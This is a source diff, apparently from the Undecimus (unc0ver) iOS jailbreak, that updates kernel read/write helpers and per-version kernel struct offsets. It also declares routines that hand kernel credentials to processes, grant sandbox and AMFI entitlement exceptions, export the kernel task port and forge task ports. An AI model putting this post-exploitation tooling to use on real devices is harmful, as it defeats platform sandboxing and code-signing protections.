@@ -3,6 +3,7 @@
 
 #include <mach/mach.h>
 #include <stdbool.h>
+#include <common.h>
 
 /***** mach_vm.h *****/
 kern_return_t mach_vm_read(
@@ -43,31 +44,46 @@ kern_return_t mach_vm_protect(
     boolean_t set_maximum,
     vm_prot_t new_protection);
 
+kern_return_t mach_vm_remap(
+    mach_port_name_t target,
+    mach_vm_address_t *address,
+    mach_vm_size_t size,
+    mach_vm_offset_t mask,
+    int flags,
+    mach_port_name_t src_task,
+    mach_vm_address_t src_address,
+    boolean_t copy,
+    vm_prot_t *cur_protection,
+    vm_prot_t *max_protection,
+    vm_inherit_t inheritance);
+
+extern size_t kreads;
+extern size_t kwrites;
 extern mach_port_t tfp0;
 
-size_t kread(uint64_t where, void* p, size_t size);
-size_t kwrite(uint64_t where, const void* p, size_t size);
+size_t kread(kptr_t where, void* p, size_t size);
+size_t kwrite(kptr_t where, const void* p, size_t size);
 
 #define rk32(kaddr) ReadKernel32(kaddr)
 #define rk64(kaddr) ReadKernel64(kaddr)
-uint32_t ReadKernel32(uint64_t kaddr);
-uint64_t ReadKernel64(uint64_t kaddr);
+uint32_t ReadKernel32(kptr_t kaddr);
+uint64_t ReadKernel64(kptr_t kaddr);
 
 #define wk32(kaddr, val) WriteKernel32(kaddr, val)
 #define wk64(kaddr, val) WriteKernel64(kaddr, val)
-void WriteKernel32(uint64_t kaddr, uint32_t val);
-void WriteKernel64(uint64_t kaddr, uint64_t val);
+bool WriteKernel32(kptr_t kaddr, uint32_t val);
+bool WriteKernel64(kptr_t kaddr, uint64_t val);
 
-bool wkbuffer(uint64_t kaddr, void* buffer, size_t length);
-bool rkbuffer(uint64_t kaddr, void* buffer, size_t length);
+bool wkbuffer(kptr_t kaddr, void* buffer, size_t length);
+bool rkbuffer(kptr_t kaddr, void* buffer, size_t length);
 
 void kmemcpy(uint64_t dest, uint64_t src, uint32_t length);
 
-void kmem_protect(uint64_t kaddr, uint32_t size, int prot);
+bool kmem_protect(kptr_t kaddr, uint32_t size, vm_prot_t prot);
 
-uint64_t kmem_alloc(uint64_t size);
-uint64_t kmem_alloc_wired(uint64_t size);
-void kmem_free(uint64_t kaddr, uint64_t size);
+kptr_t kmem_alloc(uint64_t size);
+kptr_t kmem_alloc_wired(uint64_t size);
+bool kmem_free(kptr_t kaddr, uint64_t size);
 
 void prepare_rk_via_kmem_read_port(mach_port_t port);
 void prepare_rwk_via_tfp0(mach_port_t port);

Undecimus/source/KernelOffsets.h

@@ -1,7 +1,9 @@
 #ifndef KernelOffsets_h
 #define KernelOffsets_h
 
-enum kstruct_offset {
+extern uint32_t* offsets;
+
+enum kernel_offset {
     /* struct task */
     KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
     KSTRUCT_OFFSET_TASK_REF_COUNT,
@@ -14,6 +16,7 @@ enum kstruct_offset {
     KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_ADDR,
     KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_SIZE,
     KSTRUCT_OFFSET_TASK_TFLAGS,
+    KSTRUCT_OFFSET_TASK_LOCK,
 
     /* struct ipc_port */
     KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
@@ -32,6 +35,12 @@ enum kstruct_offset {
     KSTRUCT_OFFSET_PROC_TASK,
     KSTRUCT_OFFSET_PROC_UCRED,
     KSTRUCT_OFFSET_PROC_P_LIST,
+    KSTRUCT_OFFSET_PROC_P_CSFLAGS,
+    KSTRUCT_OFFSET_PROC_P_MEMSTAT_STATE,
+    KSTRUCT_OFFSET_PROC_MLOCK,
+    KSTRUCT_OFFSET_PROC_UCRED_MLOCK,
+    KSTRUCT_OFFSET_PROC_SVUID,
+    KSTRUCT_OFFSET_PROC_SVGID,
 
     /* struct filedesc */
     KSTRUCT_OFFSET_FILEDESC_FD_OFILES,
@@ -64,17 +73,52 @@ enum kstruct_offset {
     /* struct mount */
     KSTRUCT_OFFSET_MOUNT_MNT_FLAG,
     KSTRUCT_OFFSET_MOUNT_MNT_DATA,
+    KSTRUCT_OFFSET_MOUNT_MNT_MLOCK,
 
     /* struct host */
     KSTRUCT_OFFSET_HOST_SPECIAL,
     
     /* struct ucred */
     KSTRUCT_OFFSET_UCRED_CR_UID,
+    KSTRUCT_OFFSET_UCRED_CR_RUID,
+    KSTRUCT_OFFSET_UCRED_CR_SVUID,
+    KSTRUCT_OFFSET_UCRED_CR_NGROUPS,
+    KSTRUCT_OFFSET_UCRED_CR_GROUPS,
+    KSTRUCT_OFFSET_UCRED_CR_RGID,
+    KSTRUCT_OFFSET_UCRED_CR_SVGID,
+    KSTRUCT_OFFSET_UCRED_CR_GMUID,
+    KSTRUCT_OFFSET_UCRED_CR_FLAGS,
     KSTRUCT_OFFSET_UCRED_CR_LABEL,
     
+    /* struct label */
+    KSTRUCT_OFFSET_LABEL_L_FLAGS,
+    KSTRUCT_OFFSET_LABEL_L_PERPOLICY,
+    
+    /* struct ipc_entry */
+    KSTRUCT_SIZE_IPC_ENTRY,
+    KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS,
+    
+    /* vtable OSDictionary */
+    KVTABLE_OFFSET_OSDICTIONARY_SETOBJECTWITHCHARP,
+    KVTABLE_OFFSET_OSDICTIONARY_GETOBJECTWITHCHARP,
+    KVTABLE_OFFSET_OSDICTIONARY_MERGE,
+    
+    /* vtable OSArray */
+    KVTABLE_OFFSET_OSARRAY_MERGE,
+    KVTABLE_OFFSET_OSARRAY_REMOVEOBJECT,
+    KVTABLE_OFFSET_OSARRAY_GETOBJECT,
+    
+    /* vtable OSObject */
+    KVTABLE_OFFSET_OSOBJECT_RELEASE,
+    KVTABLE_OFFSET_OSOBJECT_GETRETAINCOUNT,
+    KVTABLE_OFFSET_OSOBJECT_RETAIN,
+    
+    /* vtable OSString */
+    KVTABLE_OFFSET_OSSTRING_GETLENGTH,
+    
     KFREE_ADDR_OFFSET,
 };
 
-int koffset(enum kstruct_offset offset);
+uint32_t koffset(enum kernel_offset offset);
 
 #endif

Undecimus/source/KernelOffsets.m

@@ -6,12 +6,13 @@
 #include <sys/sysctl.h>
 #include <sys/utsname.h>
 
-#include "KernelStructureOffsets.h"
+#include "KernelOffsets.h"
 #include <common.h>
+#include "utils.h"
 
-int* offsets = NULL;
+uint32_t* offsets = NULL;
 
-int kstruct_offsets_11_0[] = {
+uint32_t kernel_offsets_11_0[] = {
     0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE
     0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT
     0x14, // KSTRUCT_OFFSET_TASK_ACTIVE
@@ -23,6 +24,7 @@ int kstruct_offsets_11_0[] = {
     0x3a8, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_ADDR
     0x3b0, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_SIZE
     0x3a0, // KSTRUCT_OFFSET_TASK_TFLAGS
+    0x0, // KSTRUCT_OFFSET_TASK_LOCK
 
     0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS
     0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES
@@ -38,7 +40,13 @@ int kstruct_offsets_11_0[] = {
     0x108, // KSTRUCT_OFFSET_PROC_P_FD
     0x18, // KSTRUCT_OFFSET_PROC_TASK
     0x100, // KSTRUCT_OFFSET_PROC_UCRED
-    0x8, // KSTRUCT_OFFSET_PROC_P_LIST
+    0x0, // KSTRUCT_OFFSET_PROC_P_LIST
+    0x2a8, // KSTRUCT_OFFSET_PROC_P_CSFLAGS
+    0x410, // KSTRUCT_OFFSET_PROC_P_MEMSTAT_STATE
+    0x58, // KSTRUCT_OFFSET_PROC_MLOCK
+    0xf0, // KSTRUCT_OFFSET_PROC_UCRED_MLOCK
+    0x40, // KSTRUCT_OFFSET_PROC_SVUID
+    0x44, // KSTRUCT_OFFSET_PROC_SVGID
 
     0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
 
@@ -62,16 +70,45 @@ int kstruct_offsets_11_0[] = {
 
     0x70, // KSTRUCT_OFFSET_MOUNT_MNT_FLAG
     0x8f8, // KSTRUCT_OFFSET_MOUNT_MNT_DATA
+    0x18, // KSTRUCT_OFFSET_MOUNT_MNT_MLOCK
 
     0x10, // KSTRUCT_OFFSET_HOST_SPECIAL
     
     0x18, // KSTRUCT_OFFSET_UCRED_CR_UID
+    0x1c, // KSTRUCT_OFFSET_UCRED_CR_RUID
+    0x20, // KSTRUCT_OFFSET_UCRED_CR_SVUID
+    0x24, // KSTRUCT_OFFSET_UCRED_CR_NGROUPS
+    0x28, // KSTRUCT_OFFSET_UCRED_CR_GROUPS
+    0x68, // KSTRUCT_OFFSET_UCRED_CR_RGID
+    0x6c, // KSTRUCT_OFFSET_UCRED_CR_SVGID
+    0x70, // KSTRUCT_OFFSET_UCRED_CR_GMUID
+    0x74, // KSTRUCT_OFFSET_UCRED_CR_FLAGS
     0x78, // KSTRUCT_OFFSET_UCRED_CR_LABEL
     
+    0x0, // KSTRUCT_OFFSET_LABEL_L_FLAGS
+    0x8, // KSTRUCT_OFFSET_LABEL_L_PERPOLICY
+    
+    0x18, // KSTRUCT_SIZE_IPC_ENTRY
+    0x8, // KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS
+    
+    0x1F, // KVTABLE_OFFSET_OSDICTIONARY_SETOBJECTWITHCHARP
+    0x26, // KVTABLE_OFFSET_OSDICTIONARY_GETOBJECTWITHCHARP
+    0x23, // KVTABLE_OFFSET_OSDICTIONARY_MERGE
+    
+    0x1E, // KVTABLE_OFFSET_OSARRAY_MERGE
+    0x20, // KVTABLE_OFFSET_OSARRAY_REMOVEOBJECT
+    0x22, // KVTABLE_OFFSET_OSARRAY_GETOBJECT
+    
+    0x05, // KVTABLE_OFFSET_OSOBJECT_RELEASE
+    0x03, // KVTABLE_OFFSET_OSOBJECT_GETRETAINCOUNT
+    0x04, // KVTABLE_OFFSET_OSOBJECT_RETAIN
+    
+    0x11, // KVTABLE_OFFSET_OSSTRING_GETLENGTH
+    
     0x6c, // KFREE_ADDR_OFFSET
 };
 
-int kstruct_offsets_11_3[] = {
+uint32_t kernel_offsets_11_3[] = {
     0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE
     0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT
     0x14, // KSTRUCT_OFFSET_TASK_ACTIVE
@@ -83,6 +120,7 @@ int kstruct_offsets_11_3[] = {
     0x3a8, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_ADDR
     0x3b0, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_SIZE
     0x3a0, // KSTRUCT_OFFSET_TASK_TFLAGS
+    0x0, // KSTRUCT_OFFSET_TASK_LOCK
 
     0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS
     0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES
@@ -98,7 +136,13 @@ int kstruct_offsets_11_3[] = {
     0x108, // KSTRUCT_OFFSET_PROC_P_FD
     0x18, // KSTRUCT_OFFSET_PROC_TASK
     0x100, // KSTRUCT_OFFSET_PROC_UCRED
-    0x8, // KSTRUCT_OFFSET_PROC_P_LIST
+    0x0, // KSTRUCT_OFFSET_PROC_P_LIST
+    0x2a8, // KSTRUCT_OFFSET_PROC_P_CSFLAGS
+    0x410, // KSTRUCT_OFFSET_PROC_P_MEMSTAT_STATE
+    0x58, // KSTRUCT_OFFSET_PROC_MLOCK
+    0xf0, // KSTRUCT_OFFSET_PROC_UCRED_MLOCK
+    0x40, // KSTRUCT_OFFSET_PROC_SVUID
+    0x44, // KSTRUCT_OFFSET_PROC_SVGID
 
     0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
 
@@ -122,16 +166,45 @@ int kstruct_offsets_11_3[] = {
 
     0x70, // KSTRUCT_OFFSET_MOUNT_MNT_FLAG
     0x8f8, // KSTRUCT_OFFSET_MOUNT_MNT_DATA
+    0x18, // KSTRUCT_OFFSET_MOUNT_MNT_MLOCK
 
     0x10, // KSTRUCT_OFFSET_HOST_SPECIAL
 
     0x18, // KSTRUCT_OFFSET_UCRED_CR_UID
+    0x1c, // KSTRUCT_OFFSET_UCRED_CR_RUID
+    0x20, // KSTRUCT_OFFSET_UCRED_CR_SVUID
+    0x24, // KSTRUCT_OFFSET_UCRED_CR_NGROUPS
+    0x28, // KSTRUCT_OFFSET_UCRED_CR_GROUPS
+    0x68, // KSTRUCT_OFFSET_UCRED_CR_RGID
+    0x6c, // KSTRUCT_OFFSET_UCRED_CR_SVGID
+    0x70, // KSTRUCT_OFFSET_UCRED_CR_GMUID
+    0x74, // KSTRUCT_OFFSET_UCRED_CR_FLAGS
     0x78, // KSTRUCT_OFFSET_UCRED_CR_LABEL
     
-    0x7c, // KFREE_ADDR_OFFSET
+    0x0, // KSTRUCT_OFFSET_LABEL_L_FLAGS
+    0x8, // KSTRUCT_OFFSET_LABEL_L_PERPOLICY
+    
+    0x18, // KSTRUCT_SIZE_IPC_ENTRY
+    0x8, // KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS
+    
+    0x1F, // KVTABLE_OFFSET_OSDICTIONARY_SETOBJECTWITHCHARP
+    0x26, // KVTABLE_OFFSET_OSDICTIONARY_GETOBJECTWITHCHARP
+    0x23, // KVTABLE_OFFSET_OSDICTIONARY_MERGE
+    
+    0x1E, // KVTABLE_OFFSET_OSARRAY_MERGE
+    0x20, // KVTABLE_OFFSET_OSARRAY_REMOVEOBJECT
+    0x22, // KVTABLE_OFFSET_OSARRAY_GETOBJECT
+    
+    0x05, // KVTABLE_OFFSET_OSOBJECT_RELEASE
+    0x03, // KVTABLE_OFFSET_OSOBJECT_GETRETAINCOUNT
+    0x04, // KVTABLE_OFFSET_OSOBJECT_RETAIN
+    
+    0x11, // KVTABLE_OFFSET_OSSTRING_GETLENGTH
+    
+    0x6c, // KFREE_ADDR_OFFSET
 };
 
-int kstruct_offsets_12_0[] = {
+uint32_t kernel_offsets_12_0[] = {
     0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE
     0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT
     0x14, // KSTRUCT_OFFSET_TASK_ACTIVE
@@ -139,10 +212,27 @@ int kstruct_offsets_12_0[] = {
     0x28, // KSTRUCT_OFFSET_TASK_NEXT
     0x30, // KSTRUCT_OFFSET_TASK_PREV
     0x300, // KSTRUCT_OFFSET_TASK_ITK_SPACE
+#if __arm64e__
+    0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO
+#else
     0x358, // KSTRUCT_OFFSET_TASK_BSD_INFO
+#endif
+#if __arm64e__
+    0x3a8, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_ADDR
+#else
     0x398, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_ADDR
+#endif
+#if __arm64e__
+    0x3b0, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_SIZE
+#else
     0x3a0, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_SIZE
+#endif
+#if __arm64e__
+    0x400, // KSTRUCT_OFFSET_TASK_TFLAGS
+#else
     0x390, // KSTRUCT_OFFSET_TASK_TFLAGS
+#endif
+    0x0, // KSTRUCT_OFFSET_TASK_LOCK
     
     0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS
     0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES
@@ -158,7 +248,13 @@ int kstruct_offsets_12_0[] = {
     0x108, // KSTRUCT_OFFSET_PROC_P_FD
     0x10, // KSTRUCT_OFFSET_PROC_TASK
     0xf8, // KSTRUCT_OFFSET_PROC_UCRED
-    0x8, // KSTRUCT_OFFSET_PROC_P_LIST
+    0x0, // KSTRUCT_OFFSET_PROC_P_LIST
+    0x290, // KSTRUCT_OFFSET_PROC_P_CSFLAGS
+    0x3f8, // KSTRUCT_OFFSET_PROC_P_MEMSTAT_STATE
+    0x50, // KSTRUCT_OFFSET_PROC_MLOCK
+    0xe8, // KSTRUCT_OFFSET_PROC_UCRED_MLOCK
+    0x32, // KSTRUCT_OFFSET_PROC_SVUID
+    0x36, // KSTRUCT_OFFSET_PROC_SVGID
     
     0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
     
@@ -182,32 +278,61 @@ int kstruct_offsets_12_0[] = {
     
     0x70, // KSTRUCT_OFFSET_MOUNT_MNT_FLAG
     0x8f8, // KSTRUCT_OFFSET_MOUNT_MNT_DATA
+    0x18, // KSTRUCT_OFFSET_MOUNT_MNT_MLOCK
     
     0x10, // KSTRUCT_OFFSET_HOST_SPECIAL
     
     0x18, // KSTRUCT_OFFSET_UCRED_CR_UID
+    0x1c, // KSTRUCT_OFFSET_UCRED_CR_RUID
+    0x20, // KSTRUCT_OFFSET_UCRED_CR_SVUID
+    0x24, // KSTRUCT_OFFSET_UCRED_CR_NGROUPS
+    0x28, // KSTRUCT_OFFSET_UCRED_CR_GROUPS
+    0x68, // KSTRUCT_OFFSET_UCRED_CR_RGID
+    0x6c, // KSTRUCT_OFFSET_UCRED_CR_SVGID
+    0x70, // KSTRUCT_OFFSET_UCRED_CR_GMUID
+    0x74, // KSTRUCT_OFFSET_UCRED_CR_FLAGS
     0x78, // KSTRUCT_OFFSET_UCRED_CR_LABEL
     
-    0x7c, // KFREE_ADDR_OFFSET
+    0x0, // KSTRUCT_OFFSET_LABEL_L_FLAGS
+    0x8, // KSTRUCT_OFFSET_LABEL_L_PERPOLICY
+    
+    0x18, // KSTRUCT_SIZE_IPC_ENTRY
+    0x8, // KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS
+    
+    0x1F, // KVTABLE_OFFSET_OSDICTIONARY_SETOBJECTWITHCHARP
+    0x26, // KVTABLE_OFFSET_OSDICTIONARY_GETOBJECTWITHCHARP
+    0x23, // KVTABLE_OFFSET_OSDICTIONARY_MERGE
+    
+    0x1E, // KVTABLE_OFFSET_OSARRAY_MERGE
+    0x20, // KVTABLE_OFFSET_OSARRAY_REMOVEOBJECT
+    0x22, // KVTABLE_OFFSET_OSARRAY_GETOBJECT
+    
+    0x05, // KVTABLE_OFFSET_OSOBJECT_RELEASE
+    0x03, // KVTABLE_OFFSET_OSOBJECT_GETRETAINCOUNT
+    0x04, // KVTABLE_OFFSET_OSOBJECT_RETAIN
+    
+    0x11, // KVTABLE_OFFSET_OSSTRING_GETLENGTH
+    
+    0x6c, // KFREE_ADDR_OFFSET
 };
 
-int koffset(enum kstruct_offset offset)
+uint32_t koffset(enum kernel_offset offset)
 {
     static dispatch_once_t onceToken;
     dispatch_once(&onceToken, ^{
         LOG("kCFCoreFoundationVersionNumber: %f", kCFCoreFoundationVersionNumber);
-        if (kCFCoreFoundationVersionNumber >= 1535.12) {
+        if (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0) {
             LOG("offsets selected for iOS 12.0 or above");
-            offsets = kstruct_offsets_12_0;
-        } else if (kCFCoreFoundationVersionNumber >= 1452.23) {
+            offsets = kernel_offsets_12_0;
+        } else if (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_11_3) {
             LOG("offsets selected for iOS 11.3 or above");
-            offsets = kstruct_offsets_11_3;
-        } else if (kCFCoreFoundationVersionNumber >= 1443.00) {
+            offsets = kernel_offsets_11_3;
+        } else if (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_11_0) {
             LOG("offsets selected for iOS 11.0 to 11.2.6");
-            offsets = kstruct_offsets_11_0;
+            offsets = kernel_offsets_11_0;
         } else {
             LOG("iOS version too low, 11.0 required");
-            exit(EXIT_FAILURE);
+            offsets = NULL;
         }
     });
     if (offsets == NULL) {

Undecimus/source/KernelUtilities.h

@@ -3,53 +3,165 @@
 
 #include <common.h>
 #include <mach/mach.h>
+#include <offsetcache.h>
+#include <stdbool.h>
 
-#define SETOFFSET(offset, val) (offs.offset = val)
-#define GETOFFSET(offset) offs.offset
+#if 0
+Credits:
+- https://stek29.rocks/2018/01/26/sandbox.html
+- https://stek29.rocks/2018/12/11/shenanigans.html
+- http://newosxbook.com/QiLin/qilin.pdf
+- https://github.com/Siguza/v0rtex/blob/e6d54c97715d6dbcdda8b9a8090484a7a47019d0/src/v0rtex.m#L1623
+#endif
 
-typedef struct {
-    kptr_t trustcache;
-    kptr_t OSBoolean_True;
-    kptr_t osunserializexml;
-    kptr_t smalloc;
-    kptr_t add_x0_x0_0x40_ret;
-    kptr_t zone_map_ref;
-    kptr_t vfs_context_current;
-    kptr_t vnode_lookup;
-    kptr_t vnode_put;
-    kptr_t kernel_task;
-    kptr_t shenanigans;
-    kptr_t lck_mtx_lock;
-    kptr_t lck_mtx_unlock;
-    kptr_t apfs_jhash_getvnode;
-    kptr_t vnode_get_snapshot;
-    kptr_t fs_lookup_snapshot_metadata_by_name_and_return_name;
-    kptr_t extension_create_file;
-    kptr_t extension_add;
-    kptr_t extension_release;
-} offsets_t;
+#if 0
+TODO:
+- Patchfind proc_lock (High priority)
+- Patchfind proc_unlock (High priority)
+- Patchfind proc_ucred_lock (High priority)
+- Patchfind proc_ucred_unlock (High priority)
+- Patchfind vnode_lock (Low priority)
+- Patchfind vnode_unlock (Low priority)
+- Patchfind mount_lock (Low priority)
+- Patchfind mount_unlock (Low priority)
+- Patchfind task_set_platform_binary (High priority)
+- Patchfind kauth_cred_ref (Low priority)
+- Patchfind kauth_cred_unref (Low priority)
+- Patchfind chgproccnt (Low priority)
+- Patchfind kauth_cred_ref (Low priority)
+- Patchfind kauth_cred_unref (Low priority)
+- Patchfind extension_destroy (Low priority)
+- Patchfind extension_create_mach (Middle priority)
+- Use offsetof with XNU headers to find structure offsets (Low priority)
+- Update Unrestrict to implement the kernel calls
+#endif
 
-extern offsets_t offs;
-extern uint64_t kernel_base;
+#define setoffset(offset, val) set_offset(#offset, val)
+#define getoffset(offset) get_offset(#offset)
+
+#define OSBoolTrue getOSBool(true)
+#define OSBoolFalse getOSBool(false)
+
+extern kptr_t kernel_base;
 extern uint64_t kernel_slide;
 
-extern uint64_t cached_task_self_addr;
-extern bool found_offsets;
+extern kptr_t cached_task_self_addr;
+extern BOOL found_offsets;
 
-uint64_t task_self_addr(void);
-uint64_t ipc_space_kernel(void);
-uint64_t find_kernel_base(void);
+kptr_t task_self_addr(void);
+kptr_t ipc_space_kernel(void);
+kptr_t find_kernel_base(void);
 
-uint64_t current_thread(void);
+kptr_t current_thread(void);
 
 mach_port_t fake_host_priv(void);
 
 int message_size_for_kalloc_size(int kalloc_size);
 
-uint64_t get_proc_struct_for_pid(pid_t pid);
-uint64_t get_address_of_port(pid_t pid, mach_port_t port);
-uint64_t get_kernel_cred_addr(void);
-uint64_t give_creds_to_process_at_addr(uint64_t proc, uint64_t cred_addr);
-void set_platform_binary(uint64_t proc);
+kptr_t get_kernel_proc_struct_addr(void);
+BOOL iterate_proc_list(void (^handler)(kptr_t, pid_t, BOOL *));
+kptr_t get_proc_struct_for_pid(pid_t pid);
+kptr_t get_address_of_port(pid_t pid, mach_port_t port);
+kptr_t get_kernel_cred_addr(void);
+kptr_t give_creds_to_process_at_addr(kptr_t proc, kptr_t cred_addr);
+BOOL set_platform_binary(kptr_t proc, BOOL set);
+
+kptr_t zm_fix_addr(kptr_t addr);
+
+BOOL verify_tfp0(void);
+
+extern int (*pmap_load_trust_cache)(kptr_t kernel_trust, size_t length);
+int _pmap_load_trust_cache(kptr_t kernel_trust, size_t length);
+
+BOOL set_host_type(host_t host, uint32_t type);
+BOOL export_tfp0(host_t host);
+BOOL unexport_tfp0(host_t host);
+
+BOOL set_csflags(kptr_t proc, uint32_t flags, BOOL value);
+BOOL set_cs_platform_binary(kptr_t proc, BOOL value);
+
+BOOL execute_with_credentials(kptr_t proc, kptr_t credentials, void (^function)(void));
+
+uint32_t get_proc_memstat_state(kptr_t proc);
+BOOL set_proc_memstat_state(kptr_t proc, uint32_t memstat_state);
+BOOL set_proc_memstat_internal(kptr_t proc, BOOL set);
+BOOL get_proc_memstat_internal(kptr_t proc);
+size_t kstrlen(kptr_t ptr);
+kptr_t kstralloc(const char *str);
+BOOL kstrfree(kptr_t ptr);
+kptr_t sstrdup(const char *str);
+void sfree(kptr_t ptr);
+int extension_create_file(kptr_t saveto, kptr_t sb, const char *path, size_t path_len, uint32_t subtype);
+int extension_create_mach(kptr_t saveto, kptr_t sb, const char *name, uint32_t subtype);
+int extension_add(kptr_t ext, kptr_t sb, const char *desc);
+void extension_release(kptr_t ext);
+void extension_destroy(kptr_t ext);
+BOOL set_file_extension(kptr_t sandbox, const char *exc_key, const char *path);
+BOOL set_mach_extension(kptr_t sandbox, const char *exc_key, const char *name);
+kptr_t proc_find(pid_t pid);
+void proc_rele(kptr_t proc);
+void proc_lock(kptr_t proc);
+void proc_unlock(kptr_t proc);
+void proc_ucred_lock(kptr_t proc);
+void proc_ucred_unlock(kptr_t proc);
+void vnode_lock(kptr_t vp);
+void vnode_unlock(kptr_t vp);
+void mount_lock(kptr_t mp);
+void mount_unlock(kptr_t mp);
+void task_set_platform_binary(kptr_t task, boolean_t is_platform);
+void kauth_cred_ref(kptr_t cred);
+void kauth_cred_unref(kptr_t cred);
+int chgproccnt(uid_t uid, int diff);
+kptr_t vfs_context_current(void);
+int vnode_lookup(const char *path, int flags, kptr_t *vpp, kptr_t ctx);
+int vnode_put(kptr_t vp);
+BOOL OSDictionary_SetItem(kptr_t OSDictionary, const char *key, kptr_t val);
+kptr_t OSDictionary_GetItem(kptr_t OSDictionary, const char *key);
+BOOL OSDictionary_Merge(kptr_t OSDictionary, kptr_t OSDictionary2);
+uint32_t OSDictionary_ItemCount(kptr_t OSDictionary);
+kptr_t OSDictionary_ItemBuffer(kptr_t OSDictionary);
+kptr_t OSDictionary_ItemKey(kptr_t buffer, uint32_t idx);
+kptr_t OSDictionary_ItemValue(kptr_t buffer, uint32_t idx);
+uint32_t OSArray_ItemCount(kptr_t OSArray);
+BOOL OSArray_Merge(kptr_t OSArray, kptr_t OSArray2);
+kptr_t OSArray_GetObject(kptr_t OSArray, uint32_t idx);
+void OSArray_RemoveObject(kptr_t OSArray, uint32_t idx);
+kptr_t OSArray_ItemBuffer(kptr_t OSArray);
+kptr_t OSObjectFunc(kptr_t OSObject, uint32_t off);
+void OSObject_Release(kptr_t OSObject);
+void OSObject_Retain(kptr_t OSObject);
+uint32_t OSObject_GetRetainCount(kptr_t OSObject);
+uint32_t OSString_GetLength(kptr_t OSString);
+kptr_t OSString_CStringPtr(kptr_t OSString);
+char *OSString_CopyString(kptr_t OSString);
+kptr_t OSUnserializeXML(const char *buffer);
+kptr_t get_exception_osarray(const char **exceptions);
+char **copy_amfi_entitlements(kptr_t present);
+kptr_t getOSBool(BOOL value);
+BOOL entitle_process(kptr_t amfi_entitlements, const char *key, kptr_t val);
+BOOL set_sandbox_exceptions(kptr_t sandbox, const char **exceptions);
+BOOL check_for_exception(char **current_exceptions, const char *exception);
+BOOL set_amfi_exceptions(kptr_t amfi_entitlements, const char **exceptions);
+BOOL set_exceptions(kptr_t sandbox, kptr_t amfi_entitlements);
+kptr_t get_amfi_entitlements(kptr_t cr_label);
+kptr_t get_sandbox(kptr_t cr_label);
+BOOL entitle_process_with_pid(pid_t pid, const char *key, kptr_t val);
+BOOL remove_memory_limit(void);
+BOOL restore_kernel_task_port(task_t *out_kernel_task_port);
+BOOL restore_kernel_base(uint64_t *out_kernel_base, uint64_t *out_kernel_slide);
+BOOL restore_kernel_offset_cache(void);
+BOOL restore_file_offset_cache(const char *offset_cache_file_path, kptr_t *out_kernel_base, uint64_t *out_kernel_slide);
+BOOL convert_port_to_task_port(mach_port_t port, kptr_t space, kptr_t task_kaddr);
+kptr_t make_fake_task(kptr_t vm_map);
+BOOL make_port_fake_task_port(mach_port_t port, kptr_t task_kaddr);
+BOOL set_hsp4(task_t port);
+kptr_t get_vnode_for_path(const char *path);
+kptr_t get_vnode_for_snapshot(int fd, char *name);
+BOOL set_kernel_task_info(void);
+int issue_extension_for_mach_service(kptr_t sb, kptr_t ctx, const char *entry_name, void *desc);
+BOOL unrestrict_process(pid_t pid);
+BOOL unrestrict_process_with_task_port(task_t task_port);
+BOOL revalidate_process(pid_t pid);
+BOOL revalidate_process_with_task_port(task_t task_port);
 
 #endif /* kutils_h */

Undecimus/source/SettingsTableViewController.h

@@ -10,25 +10,6 @@
 #import "common.h"
 #import "utils.h"
 
-#define K_TWEAK_INJECTION          @"TweakInjection"
-#define K_LOAD_DAEMONS             @"LoadDaemons"
-#define K_DUMP_APTICKET            @"DumpAPTicket"
-#define K_REFRESH_ICON_CACHE       @"RefreshIconCache"
-#define K_BOOT_NONCE               @"BootNonce"
-#define K_EXPLOIT                  @"Exploit"
-#define K_DISABLE_AUTO_UPDATES     @"DisableAutoUpdates"
-#define K_DISABLE_APP_REVOKES      @"DisableAppRevokes"
-#define K_OVERWRITE_BOOT_NONCE     @"OverwriteBootNonce"
-#define K_EXPORT_KERNEL_TASK_PORT  @"ExportKernelTaskPort"
-#define K_RESTORE_ROOTFS           @"RestoreRootFS"
-#define K_INCREASE_MEMORY_LIMIT    @"IncreaseMemoryLimit"
-#define K_ECID                     @"Ecid"
-#define K_INSTALL_OPENSSH          @"InstallOpenSSH"
-#define K_INSTALL_CYDIA            @"InstallCydia"
-#define K_RELOAD_SYSTEM_DAEMONS    @"ReloadSystemDaemons"
-#define K_HIDE_LOG_WINDOW          @"HideLogWindow"
-#define K_RESET_CYDIA_CACHE        @"ResetCydiaCache"
-
 @interface SettingsTableViewController : UITableViewController <UITextFieldDelegate>
 @property (weak, nonatomic) IBOutlet UISwitch *TweakInjectionSwitch;
